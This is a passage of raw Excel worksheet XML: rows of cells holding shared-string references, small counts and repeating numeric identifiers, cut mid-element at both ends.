      </c>
      <c r="C23009">
        <v>0</v>
      </c>
      <c r="D23009">
        <v>5923</v>
      </c>
    </row>
    <row r="23010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23010" t="s">
        <v>16229</v>
      </c>
      <c r="B23010" t="s">
        <v>16221</v>
      </c>
      <c r="C23010">
        <v>0</v>
      </c>
      <c r="D23010">
        <v>5923</v>
      </c>
    </row>
    <row r="23011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23011" t="s">
        <v>16230</v>
      </c>
      <c r="B23011" t="s">
        <v>16222</v>
      </c>
      <c r="C23011">
        <v>0</v>
      </c>
      <c r="D23011">
        <v>5923</v>
      </c>
    </row>
    <row r="23012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23012" t="s">
        <v>16223</v>
      </c>
      <c r="B23012" t="s">
        <v>16223</v>
      </c>
      <c r="C23012">
        <v>0</v>
      </c>
      <c r="D23012">
        <v>5923</v>
      </c>
    </row>
    <row r="23013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23013" t="s">
        <v>16224</v>
      </c>
      <c r="B23013" t="s">
        <v>16224</v>
      </c>
      <c r="C23013">
        <v>0</v>
      </c>
      <c r="D23013">
        <v>5923</v>
      </c>
    </row>
    <row r="23014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23014" t="s">
        <v>16228</v>
      </c>
      <c r="B23014" t="s">
        <v>16217</v>
      </c>
      <c r="C23014">
        <v>6</v>
      </c>
      <c r="D23014">
        <v>5923</v>
      </c>
    </row>
    <row r="23015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23015" t="s">
        <v>16223</v>
      </c>
      <c r="B23015" t="s">
        <v>16223</v>
      </c>
      <c r="C23015">
        <v>6</v>
      </c>
      <c r="D23015">
        <v>5923</v>
      </c>
    </row>
    <row r="23016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23016" t="s">
        <v>16228</v>
      </c>
      <c r="B23016" t="s">
        <v>16215</v>
      </c>
      <c r="C23016">
        <v>1</v>
      </c>
      <c r="D23016">
        <v>1647</v>
      </c>
    </row>
    <row r="23017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23017" t="s">
        <v>16228</v>
      </c>
      <c r="B23017" t="s">
        <v>16211</v>
      </c>
      <c r="C23017">
        <v>0</v>
      </c>
      <c r="D23017">
        <v>4899</v>
      </c>
    </row>
    <row r="23018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23018" t="s">
        <v>16231</v>
      </c>
      <c r="B23018" t="s">
        <v>16212</v>
      </c>
      <c r="C23018">
        <v>0</v>
      </c>
      <c r="D23018">
        <v>4899</v>
      </c>
    </row>
    <row r="23019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23019" t="s">
        <v>16228</v>
      </c>
      <c r="B23019" t="s">
        <v>16213</v>
      </c>
      <c r="C23019">
        <v>0</v>
      </c>
      <c r="D23019">
        <v>4899</v>
      </c>
    </row>
    <row r="23020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23020" t="s">
        <v>16231</v>
      </c>
      <c r="B23020" t="s">
        <v>16214</v>
      </c>
      <c r="C23020">
        <v>0</v>
      </c>
      <c r="D23020">
        <v>4899</v>
      </c>
    </row>
    <row r="23021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23021" t="s">
        <v>16228</v>
      </c>
      <c r="B23021" t="s">
        <v>16215</v>
      </c>
      <c r="C23021">
        <v>4</v>
      </c>
      <c r="D23021">
        <v>4899</v>
      </c>
    </row>
    <row r="23022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23022" t="s">
        <v>16231</v>
      </c>
      <c r="B23022" t="s">
        <v>16216</v>
      </c>
      <c r="C23022">
        <v>4</v>
      </c>
      <c r="D23022">
        <v>4899</v>
      </c>
    </row>
    <row r="23023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23023" t="s">
        <v>16228</v>
      </c>
      <c r="B23023" t="s">
        <v>16217</v>
      </c>
      <c r="C23023">
        <v>15</v>
      </c>
      <c r="D23023">
        <v>4899</v>
      </c>
    </row>
    <row r="23024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23024" t="s">
        <v>16231</v>
      </c>
      <c r="B23024" t="s">
        <v>16218</v>
      </c>
      <c r="C23024">
        <v>0</v>
      </c>
      <c r="D23024">
        <v>4899</v>
      </c>
    </row>
    <row r="23025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23025" t="s">
        <v>16229</v>
      </c>
      <c r="B23025" t="s">
        <v>16219</v>
      </c>
      <c r="C23025">
        <v>0</v>
      </c>
      <c r="D23025">
        <v>4899</v>
      </c>
    </row>
    <row r="23026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23026" t="s">
        <v>16230</v>
      </c>
      <c r="B23026" t="s">
        <v>16220</v>
      </c>
      <c r="C23026">
        <v>0</v>
      </c>
      <c r="D23026">
        <v>4899</v>
      </c>
    </row>
    <row r="23027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23027" t="s">
        <v>16229</v>
      </c>
      <c r="B23027" t="s">
        <v>16221</v>
      </c>
      <c r="C23027">
        <v>0</v>
      </c>
      <c r="D23027">
        <v>4899</v>
      </c>
    </row>
    <row r="23028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23028" t="s">
        <v>16230</v>
      </c>
      <c r="B23028" t="s">
        <v>16222</v>
      </c>
      <c r="C23028">
        <v>0</v>
      </c>
      <c r="D23028">
        <v>4899</v>
      </c>
    </row>
    <row r="23029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23029" t="s">
        <v>16223</v>
      </c>
      <c r="B23029" t="s">
        <v>16223</v>
      </c>
      <c r="C23029">
        <v>24</v>
      </c>
      <c r="D23029">
        <v>4899</v>
      </c>
    </row>
    <row r="23030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23030" t="s">
        <v>16224</v>
      </c>
      <c r="B23030" t="s">
        <v>16224</v>
      </c>
      <c r="C23030">
        <v>0</v>
      </c>
      <c r="D23030">
        <v>4899</v>
      </c>
    </row>
    <row r="23031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23031" t="s">
        <v>16228</v>
      </c>
      <c r="B23031" t="s">
        <v>16211</v>
      </c>
      <c r="C23031">
        <v>0</v>
      </c>
      <c r="D23031">
        <v>6137</v>
      </c>
    </row>
    <row r="23032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23032" t="s">
        <v>16231</v>
      </c>
      <c r="B23032" t="s">
        <v>16212</v>
      </c>
      <c r="C23032">
        <v>0</v>
      </c>
      <c r="D23032">
        <v>6137</v>
      </c>
    </row>
    <row r="23033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23033" t="s">
        <v>16228</v>
      </c>
      <c r="B23033" t="s">
        <v>16213</v>
      </c>
      <c r="C23033">
        <v>0</v>
      </c>
      <c r="D23033">
        <v>6137</v>
      </c>
    </row>
    <row r="23034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23034" t="s">
        <v>16231</v>
      </c>
      <c r="B23034" t="s">
        <v>16214</v>
      </c>
      <c r="C23034">
        <v>0</v>
      </c>
      <c r="D23034">
        <v>6137</v>
      </c>
    </row>
    <row r="23035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23035" t="s">
        <v>16228</v>
      </c>
      <c r="B23035" t="s">
        <v>16215</v>
      </c>
      <c r="C23035">
        <v>0</v>
      </c>
      <c r="D23035">
        <v>6137</v>
      </c>
    </row>
    <row r="23036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23036" t="s">
        <v>16231</v>
      </c>
      <c r="B23036" t="s">
        <v>16216</v>
      </c>
      <c r="C23036">
        <v>2</v>
      </c>
      <c r="D23036">
        <v>6137</v>
      </c>
    </row>
    <row r="23037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23037" t="s">
        <v>16228</v>
      </c>
      <c r="B23037" t="s">
        <v>16217</v>
      </c>
      <c r="C23037">
        <v>3</v>
      </c>
      <c r="D23037">
        <v>6137</v>
      </c>
    </row>
    <row r="23038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23038" t="s">
        <v>16231</v>
      </c>
      <c r="B23038" t="s">
        <v>16218</v>
      </c>
      <c r="C23038">
        <v>0</v>
      </c>
      <c r="D23038">
        <v>6137</v>
      </c>
    </row>
    <row r="23039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23039" t="s">
        <v>16229</v>
      </c>
      <c r="B23039" t="s">
        <v>16219</v>
      </c>
      <c r="C23039">
        <v>0</v>
      </c>
      <c r="D23039">
        <v>6137</v>
      </c>
    </row>
    <row r="23040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23040" t="s">
        <v>16230</v>
      </c>
      <c r="B23040" t="s">
        <v>16220</v>
      </c>
      <c r="C23040">
        <v>0</v>
      </c>
      <c r="D23040">
        <v>6137</v>
      </c>
    </row>
    <row r="23041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23041" t="s">
        <v>16229</v>
      </c>
      <c r="B23041" t="s">
        <v>16221</v>
      </c>
      <c r="C23041">
        <v>17</v>
      </c>
      <c r="D23041">
        <v>6137</v>
      </c>
    </row>
    <row r="23042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23042" t="s">
        <v>16230</v>
      </c>
      <c r="B23042" t="s">
        <v>16222</v>
      </c>
      <c r="C23042">
        <v>0</v>
      </c>
      <c r="D23042">
        <v>6137</v>
      </c>
    </row>
    <row r="23043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23043" t="s">
        <v>16223</v>
      </c>
      <c r="B23043" t="s">
        <v>16223</v>
      </c>
      <c r="C23043">
        <v>25</v>
      </c>
      <c r="D23043">
        <v>6137</v>
      </c>
    </row>
    <row r="23044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23044" t="s">
        <v>16224</v>
      </c>
      <c r="B23044" t="s">
        <v>16224</v>
      </c>
      <c r="C23044">
        <v>1</v>
      </c>
      <c r="D23044">
        <v>6137</v>
      </c>
    </row>
    <row r="23045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23045" t="s">
        <v>16228</v>
      </c>
      <c r="B23045" t="s">
        <v>16211</v>
      </c>
      <c r="C23045">
        <v>0</v>
      </c>
      <c r="D23045">
        <v>6136</v>
      </c>
    </row>
    <row r="23046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23046" t="s">
        <v>16231</v>
      </c>
      <c r="B23046" t="s">
        <v>16212</v>
      </c>
      <c r="C23046">
        <v>0</v>
      </c>
      <c r="D23046">
        <v>6136</v>
      </c>
    </row>
    <row r="23047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23047" t="s">
        <v>16228</v>
      </c>
      <c r="B23047" t="s">
        <v>16213</v>
      </c>
      <c r="C23047">
        <v>0</v>
      </c>
      <c r="D23047">
        <v>6136</v>
      </c>
    </row>
    <row r="23048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23048" t="s">
        <v>16231</v>
      </c>
      <c r="B23048" t="s">
        <v>16214</v>
      </c>
      <c r="C23048">
        <v>0</v>
      </c>
      <c r="D23048">
        <v>6136</v>
      </c>
    </row>
    <row r="23049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23049" t="s">
        <v>16228</v>
      </c>
      <c r="B23049" t="s">
        <v>16215</v>
      </c>
      <c r="C23049">
        <v>0</v>
      </c>
      <c r="D23049">
        <v>6136</v>
      </c>
    </row>
    <row r="23050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23050" t="s">
        <v>16231</v>
      </c>
      <c r="B23050" t="s">
        <v>16216</v>
      </c>
      <c r="C23050">
        <v>2</v>
      </c>
      <c r="D23050">
        <v>6136</v>
      </c>
    </row>
    <row r="23051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23051" t="s">
        <v>16228</v>
      </c>
      <c r="B23051" t="s">
        <v>16217</v>
      </c>
      <c r="C23051">
        <v>2</v>
      </c>
      <c r="D23051">
        <v>6136</v>
      </c>
    </row>
    <row r="23052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23052" t="s">
        <v>16231</v>
      </c>
      <c r="B23052" t="s">
        <v>16218</v>
      </c>
      <c r="C23052">
        <v>4</v>
      </c>
      <c r="D23052">
        <v>6136</v>
      </c>
    </row>
    <row r="23053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23053" t="s">
        <v>16229</v>
      </c>
      <c r="B23053" t="s">
        <v>16219</v>
      </c>
      <c r="C23053">
        <v>0</v>
      </c>
      <c r="D23053">
        <v>6136</v>
      </c>
    </row>
    <row r="23054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23054" t="s">
        <v>16230</v>
      </c>
      <c r="B23054" t="s">
        <v>16220</v>
      </c>
      <c r="C23054">
        <v>0</v>
      </c>
      <c r="D23054">
        <v>6136</v>
      </c>
    </row>
    <row r="23055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23055" t="s">
        <v>16229</v>
      </c>
      <c r="B23055" t="s">
        <v>16221</v>
      </c>
      <c r="C23055">
        <v>11</v>
      </c>
      <c r="D23055">
        <v>6136</v>
      </c>
    </row>
    <row r="23056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23056" t="s">
        <v>16230</v>
      </c>
      <c r="B23056" t="s">
        <v>16222</v>
      </c>
      <c r="C23056">
        <v>0</v>
      </c>
      <c r="D23056">
        <v>6136</v>
      </c>
    </row>
    <row r="23057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23057" t="s">
        <v>16223</v>
      </c>
      <c r="B23057" t="s">
        <v>16223</v>
      </c>
      <c r="C23057">
        <v>25</v>
      </c>
      <c r="D23057">
        <v>6136</v>
      </c>
    </row>
    <row r="23058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23058" t="s">
        <v>16224</v>
      </c>
      <c r="B23058" t="s">
        <v>16224</v>
      </c>
      <c r="C23058">
        <v>1</v>
      </c>
      <c r="D23058">
        <v>6136</v>
      </c>
    </row>
    <row r="23059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23059" t="s">
        <v>16228</v>
      </c>
      <c r="B23059" t="s">
        <v>16211</v>
      </c>
      <c r="C23059">
        <v>0</v>
      </c>
      <c r="D23059">
        <v>1977</v>
      </c>
    </row>
    <row r="23060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23060" t="s">
        <v>16231</v>
      </c>
      <c r="B23060" t="s">
        <v>16212</v>
      </c>
      <c r="C23060">
        <v>0</v>
      </c>
      <c r="D23060">
        <v>1977</v>
      </c>
    </row>
    <row r="23061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23061" t="s">
        <v>16228</v>
      </c>
      <c r="B23061" t="s">
        <v>16213</v>
      </c>
      <c r="C23061">
        <v>0</v>
      </c>
      <c r="D23061">
        <v>1977</v>
      </c>
    </row>
    <row r="23062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23062" t="s">
        <v>16231</v>
      </c>
      <c r="B23062" t="s">
        <v>16214</v>
      </c>
      <c r="C23062">
        <v>0</v>
      </c>
      <c r="D23062">
        <v>1977</v>
      </c>
    </row>
    <row r="23063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23063" t="s">
        <v>16228</v>
      </c>
      <c r="B23063" t="s">
        <v>16215</v>
      </c>
      <c r="C23063">
        <v>1</v>
      </c>
      <c r="D23063">
        <v>1977</v>
      </c>
    </row>
    <row r="23064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23064" t="s">
        <v>16231</v>
      </c>
      <c r="B23064" t="s">
        <v>16216</v>
      </c>
      <c r="C23064">
        <v>1</v>
      </c>
      <c r="D23064">
        <v>1977</v>
      </c>
    </row>
    <row r="23065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23065" t="s">
        <v>16228</v>
      </c>
      <c r="B23065" t="s">
        <v>16217</v>
      </c>
      <c r="C23065">
        <v>5</v>
      </c>
      <c r="D23065">
        <v>1977</v>
      </c>
    </row>
    <row r="23066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23066" t="s">
        <v>16231</v>
      </c>
      <c r="B23066" t="s">
        <v>16218</v>
      </c>
      <c r="C23066">
        <v>0</v>
      </c>
      <c r="D23066">
        <v>1977</v>
      </c>
    </row>
    <row r="23067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23067" t="s">
        <v>16229</v>
      </c>
      <c r="B23067" t="s">
        <v>16219</v>
      </c>
      <c r="C23067">
        <v>0</v>
      </c>
      <c r="D23067">
        <v>1977</v>
      </c>
    </row>
    <row r="23068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23068" t="s">
        <v>16230</v>
      </c>
      <c r="B23068" t="s">
        <v>16220</v>
      </c>
      <c r="C23068">
        <v>0</v>
      </c>
      <c r="D23068">
        <v>1977</v>
      </c>
    </row>
    <row r="23069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23069" t="s">
        <v>16229</v>
      </c>
      <c r="B23069" t="s">
        <v>16221</v>
      </c>
      <c r="C23069">
        <v>2</v>
      </c>
      <c r="D23069">
        <v>1977</v>
      </c>
    </row>
    <row r="23070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23070" t="s">
        <v>16230</v>
      </c>
      <c r="B23070" t="s">
        <v>16222</v>
      </c>
      <c r="C23070">
        <v>0</v>
      </c>
      <c r="D23070">
        <v>1977</v>
      </c>
    </row>
    <row r="23071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23071" t="s">
        <v>16223</v>
      </c>
      <c r="B23071" t="s">
        <v>16223</v>
      </c>
      <c r="C23071">
        <v>0</v>
      </c>
      <c r="D23071">
        <v>1977</v>
      </c>
    </row>
    <row r="23072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23072" t="s">
        <v>16224</v>
      </c>
      <c r="B23072" t="s">
        <v>16224</v>
      </c>
      <c r="C23072">
        <v>0</v>
      </c>
      <c r="D23072">
        <v>1977</v>
      </c>
    </row>
    <row r="23073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23073" t="s">
        <v>16228</v>
      </c>
      <c r="B23073" t="s">
        <v>16217</v>
      </c>
      <c r="C23073">
        <v>4</v>
      </c>
      <c r="D23073">
        <v>1977</v>
      </c>
    </row>
    <row r="23074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23074" t="s">
        <v>16231</v>
      </c>
      <c r="B23074" t="s">
        <v>16218</v>
      </c>
      <c r="C23074">
        <v>2</v>
      </c>
      <c r="D23074">
        <v>1977</v>
      </c>
    </row>
    <row r="23075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23075" t="s">
        <v>16228</v>
      </c>
      <c r="B23075" t="s">
        <v>16211</v>
      </c>
      <c r="C23075">
        <v>0</v>
      </c>
      <c r="D23075">
        <v>1092</v>
      </c>
    </row>
    <row r="23076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23076" t="s">
        <v>16231</v>
      </c>
      <c r="B23076" t="s">
        <v>16212</v>
      </c>
      <c r="C23076">
        <v>0</v>
      </c>
      <c r="D23076">
        <v>1092</v>
      </c>
    </row>
    <row r="23077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23077" t="s">
        <v>16228</v>
      </c>
      <c r="B23077" t="s">
        <v>16213</v>
      </c>
      <c r="C23077">
        <v>0</v>
      </c>
      <c r="D23077">
        <v>1092</v>
      </c>
    </row>
    <row r="23078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23078" t="s">
        <v>16231</v>
      </c>
      <c r="B23078" t="s">
        <v>16214</v>
      </c>
      <c r="C23078">
        <v>0</v>
      </c>
      <c r="D23078">
        <v>1092</v>
      </c>
    </row>
    <row r="23079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23079" t="s">
        <v>16228</v>
      </c>
      <c r="B23079" t="s">
        <v>16215</v>
      </c>
      <c r="C23079">
        <v>0</v>
      </c>
      <c r="D23079">
        <v>1092</v>
      </c>
    </row>
    <row r="23080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23080" t="s">
        <v>16231</v>
      </c>
      <c r="B23080" t="s">
        <v>16216</v>
      </c>
      <c r="C23080">
        <v>3</v>
      </c>
      <c r="D23080">
        <v>1092</v>
      </c>
    </row>
    <row r="23081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23081" t="s">
        <v>16228</v>
      </c>
      <c r="B23081" t="s">
        <v>16217</v>
      </c>
      <c r="C23081">
        <v>5</v>
      </c>
      <c r="D23081">
        <v>1092</v>
      </c>
    </row>
    <row r="23082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23082" t="s">
        <v>16231</v>
      </c>
      <c r="B23082" t="s">
        <v>16218</v>
      </c>
      <c r="C23082">
        <v>0</v>
      </c>
      <c r="D23082">
        <v>1092</v>
      </c>
    </row>
    <row r="23083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23083" t="s">
        <v>16229</v>
      </c>
      <c r="B23083" t="s">
        <v>16219</v>
      </c>
      <c r="C23083">
        <v>0</v>
      </c>
      <c r="D23083">
        <v>1092</v>
      </c>
    </row>
    <row r="23084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23084" t="s">
        <v>16230</v>
      </c>
      <c r="B23084" t="s">
        <v>16220</v>
      </c>
      <c r="C23084">
        <v>0</v>
      </c>
      <c r="D23084">
        <v>1092</v>
      </c>
    </row>
    <row r="23085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23085" t="s">
        <v>16229</v>
      </c>
      <c r="B23085" t="s">
        <v>16221</v>
      </c>
      <c r="C23085">
        <v>10</v>
      </c>
      <c r="D23085">
        <v>1092</v>
      </c>
    </row>
    <row r="23086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23086" t="s">
        <v>16230</v>
      </c>
      <c r="B23086" t="s">
        <v>16222</v>
      </c>
      <c r="C23086">
        <v>0</v>
      </c>
      <c r="D23086">
        <v>1092</v>
      </c>
    </row>
    <row r="23087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23087" t="s">
        <v>16223</v>
      </c>
      <c r="B23087" t="s">
        <v>16223</v>
      </c>
      <c r="C23087">
        <v>25</v>
      </c>
      <c r="D23087">
        <v>1092</v>
      </c>
    </row>
    <row r="23088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23088" t="s">
        <v>16224</v>
      </c>
      <c r="B23088" t="s">
        <v>16224</v>
      </c>
      <c r="C23088">
        <v>1</v>
      </c>
      <c r="D23088">
        <v>1092</v>
      </c>
    </row>
    <row r="23089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23089" t="s">
        <v>16228</v>
      </c>
      <c r="B23089" t="s">
        <v>16211</v>
      </c>
      <c r="C23089">
        <v>0</v>
      </c>
      <c r="D23089">
        <v>505</v>
      </c>
    </row>
    <row r="23090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23090" t="s">
        <v>16231</v>
      </c>
      <c r="B23090" t="s">
        <v>16212</v>
      </c>
      <c r="C23090">
        <v>0</v>
      </c>
      <c r="D23090">
        <v>505</v>
      </c>
    </row>
    <row r="23091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23091" t="s">
        <v>16228</v>
      </c>
      <c r="B23091" t="s">
        <v>16213</v>
      </c>
      <c r="C23091">
        <v>0</v>
      </c>
      <c r="D23091">
        <v>505</v>
      </c>
    </row>
    <row r="23092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23092" t="s">
        <v>16231</v>
      </c>
      <c r="B23092" t="s">
        <v>16214</v>
      </c>
      <c r="C23092">
        <v>0</v>
      </c>
      <c r="D23092">
        <v>505</v>
      </c>
    </row>
    <row r="23093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23093" t="s">
        <v>16228</v>
      </c>
      <c r="B23093" t="s">
        <v>16215</v>
      </c>
      <c r="C23093">
        <v>1</v>
      </c>
      <c r="D23093">
        <v>505</v>
      </c>
    </row>
    <row r="23094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23094" t="s">
        <v>16231</v>
      </c>
      <c r="B23094" t="s">
        <v>16216</v>
      </c>
      <c r="C23094">
        <v>0</v>
      </c>
      <c r="D23094">
        <v>505</v>
      </c>
    </row>
    <row r="23095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23095" t="s">
        <v>16228</v>
      </c>
      <c r="B23095" t="s">
        <v>16217</v>
      </c>
      <c r="C23095">
        <v>2</v>
      </c>
      <c r="D23095">
        <v>505</v>
      </c>
    </row>
    <row r="23096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23096" t="s">
        <v>16231</v>
      </c>
      <c r="B23096" t="s">
        <v>16218</v>
      </c>
      <c r="C23096">
        <v>0</v>
      </c>
      <c r="D23096">
        <v>505</v>
      </c>
    </row>
    <row r="23097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23097" t="s">
        <v>16229</v>
      </c>
      <c r="B23097" t="s">
        <v>16219</v>
      </c>
      <c r="C23097">
        <v>1</v>
      </c>
      <c r="D23097">
        <v>505</v>
      </c>
    </row>
    <row r="23098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23098" t="s">
        <v>16230</v>
      </c>
      <c r="B23098" t="s">
        <v>16220</v>
      </c>
      <c r="C23098">
        <v>1</v>
      </c>
      <c r="D23098">
        <v>505</v>
      </c>
    </row>
    <row r="23099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23099" t="s">
        <v>16229</v>
      </c>
      <c r="B23099" t="s">
        <v>16221</v>
      </c>
      <c r="C23099">
        <v>10</v>
      </c>
      <c r="D23099">
        <v>505</v>
      </c>
    </row>
    <row r="23100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23100" t="s">
        <v>16230</v>
      </c>
      <c r="B23100" t="s">
        <v>16222</v>
      </c>
      <c r="C23100">
        <v>15</v>
      </c>
      <c r="D23100">
        <v>505</v>
      </c>
    </row>
    <row r="23101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23101" t="s">
        <v>16223</v>
      </c>
      <c r="B23101" t="s">
        <v>16223</v>
      </c>
      <c r="C23101">
        <v>0</v>
      </c>
      <c r="D23101">
        <v>505</v>
      </c>
    </row>
    <row r="23102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23102" t="s">
        <v>16224</v>
      </c>
      <c r="B23102" t="s">
        <v>16224</v>
      </c>
      <c r="C23102">
        <v>0</v>
      </c>
      <c r="D23102">
        <v>505</v>
      </c>
    </row>
    <row r="23103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23103" t="s">
        <v>16228</v>
      </c>
      <c r="B23103" t="s">
        <v>16211</v>
      </c>
      <c r="C23103">
        <v>0</v>
      </c>
      <c r="D23103">
        <v>5943</v>
      </c>
    </row>
    <row r="23104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23104" t="s">
        <v>16231</v>
      </c>
      <c r="B23104" t="s">
        <v>16212</v>
      </c>
      <c r="C23104">
        <v>0</v>
      </c>
      <c r="D23104">
        <v>5943</v>
      </c>
    </row>
    <row r="23105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23105" t="s">
        <v>16228</v>
      </c>
      <c r="B23105" t="s">
        <v>16213</v>
      </c>
      <c r="C23105">
        <v>0</v>
      </c>
      <c r="D23105">
        <v>5943</v>
      </c>
    </row>
    <row r="23106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23106" t="s">
        <v>16231</v>
      </c>
      <c r="B23106" t="s">
        <v>16214</v>
      </c>
      <c r="C23106">
        <v>0</v>
      </c>
      <c r="D23106">
        <v>5943</v>
      </c>
    </row>
    <row r="23107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23107" t="s">
        <v>16228</v>
      </c>
      <c r="B23107" t="s">
        <v>16215</v>
      </c>
      <c r="C23107">
        <v>4</v>
      </c>
      <c r="D23107">
        <v>5943</v>
      </c>
    </row>
    <row r="23108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23108" t="s">
        <v>16231</v>
      </c>
      <c r="B23108" t="s">
        <v>16216</v>
      </c>
      <c r="C23108">
        <v>5</v>
      </c>
      <c r="D23108">
        <v>5943</v>
      </c>
    </row>
    <row r="23109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23109" t="s">
        <v>16228</v>
      </c>
      <c r="B23109" t="s">
        <v>16217</v>
      </c>
      <c r="C23109">
        <v>15</v>
      </c>
      <c r="D23109">
        <v>5943</v>
      </c>
    </row>
    <row r="23110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23110" t="s">
        <v>16231</v>
      </c>
      <c r="B23110" t="s">
        <v>16218</v>
      </c>
      <c r="C23110">
        <v>5</v>
      </c>
      <c r="D23110">
        <v>5943</v>
      </c>
    </row>
    <row r="23111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23111" t="s">
        <v>16229</v>
      </c>
      <c r="B23111" t="s">
        <v>16219</v>
      </c>
      <c r="C23111">
        <v>2</v>
      </c>
      <c r="D23111">
        <v>5943</v>
      </c>
    </row>
    <row r="23112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23112" t="s">
        <v>16230</v>
      </c>
      <c r="B23112" t="s">
        <v>16220</v>
      </c>
      <c r="C23112">
        <v>8</v>
      </c>
      <c r="D23112">
        <v>5943</v>
      </c>
    </row>
    <row r="23113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23113" t="s">
        <v>16229</v>
      </c>
      <c r="B23113" t="s">
        <v>16221</v>
      </c>
      <c r="C23113">
        <v>18</v>
      </c>
      <c r="D23113">
        <v>5943</v>
      </c>
    </row>
    <row r="23114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23114" t="s">
        <v>16230</v>
      </c>
      <c r="B23114" t="s">
